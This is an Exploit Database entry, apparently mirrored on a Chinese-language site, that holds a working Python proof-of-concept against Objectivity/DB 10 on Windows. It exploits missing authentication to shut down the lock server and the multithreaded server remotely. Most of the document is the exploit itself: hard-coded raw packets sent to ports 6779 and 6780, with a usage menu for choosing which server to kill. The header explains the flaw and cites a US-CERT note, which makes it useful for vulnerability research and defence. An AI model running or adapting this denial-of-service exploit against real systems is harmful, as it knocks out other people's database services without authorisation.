Objectivity/DB – Lack of Authentication

• Exploit Database
• 10 阅读

• 作者： Jeremy Brown
  日期： 2011-01-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15988/

• #!/usr/bin/python
  # obj.py
  # Objectivity/DB Lack of Authentication Remote Exploit
  # Jeremy Brown [0xjbrown41-gmail-com]
  # Jan 2011
  #
  # "Objectivity, Inc. is a leader in distributed, scalable database technology.
  # Our patented data management engine and persistent object store is the enabling
  # technology powering some of the most complex applications and mission critical
  # systems used in government, business and science organizations today."
  #
  # Objectivity/DB includes many different tools for administration. The
  # problem is, anyone can use these tools to perform operations on the host
  # running the lock server, advanced multithreaded server, and probably
  # it's other servers as well, without any authentication. This design flaw
  # puts the host running these servers at risk of potentially unauthorized
  # operations being performed on the system, locally or remotely.
  #
  # This code demostrates a couple of the easiest operations to replicate
  # by hand, like killing the lock and am servers. The suite contains lots
  # of other admin tools that do various, more interesting tasks with the
  # Objectivity/DB, such as oobackup, oonewfd, oodeletefd, oodebug, etc...
  #
  # Tested on Objectivity/DB 10 running on Windows
  #
  # Fixed version: N/A, US-CERT coordinated the communication and released
  # a vulnerability note after the vendor did not provide additional feedback.
  #
  # http://www.kb.cert.org/vuls/id/782567
  #
  
  import sys
  import socket
  
  kill_ooams=(
  "\x0d\x03"+
  "\x00"*5+
  "\x02"+
  "\x00"*3+
  "\x19\xf0\x92\xed\x89\xf4\xe8\x95\x43\x03"+
  "\x00"*15+
  "\x61\x62\x63"+
  "\x00"+
  "\x31\x32\x33\x34"+
  "\x00"*3+
  "\x05\x8c"+
  "\x00"*3+
  "\x0d"+
  "\x00"*4
  )
  
  kill_ools=(
  "\x0d\x03"+
  "\x00"*5+
  "\x77"+
  "\x00"*3+
  "\x04\xad\xc4\xae\xda\x9e\x48\xd6\x44\x03"+
  "\x00"*15
  )
  
  if len(sys.argv)<3:
   print "Objectivity/DB Remote Exploit"
   print "Usage: %s <target> <operation>"%sys.argv[0]
   print "\nWhat would you like to do?\n"
   print "[1] Kill the advanced multithreaded server"
   print "[2] Kill the lock server"
   print "For other operations, check out oobackup, oodebug, etc"
   sys.exit(0)
  
  target=sys.argv[1]
  op=int(sys.argv[2])
  
  if((op<1)|(op>2)):
   print "Invalid operation"
   sys.exit(1)
  
  if(op==1):
   port=6779
   data=kill_ooams
  
  if(op==2):
   port=6780
   data=kill_ools
  
  cs=target,port
  
  sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  sock.connect(cs)
  
  sock.send(data)
  
  sock.close()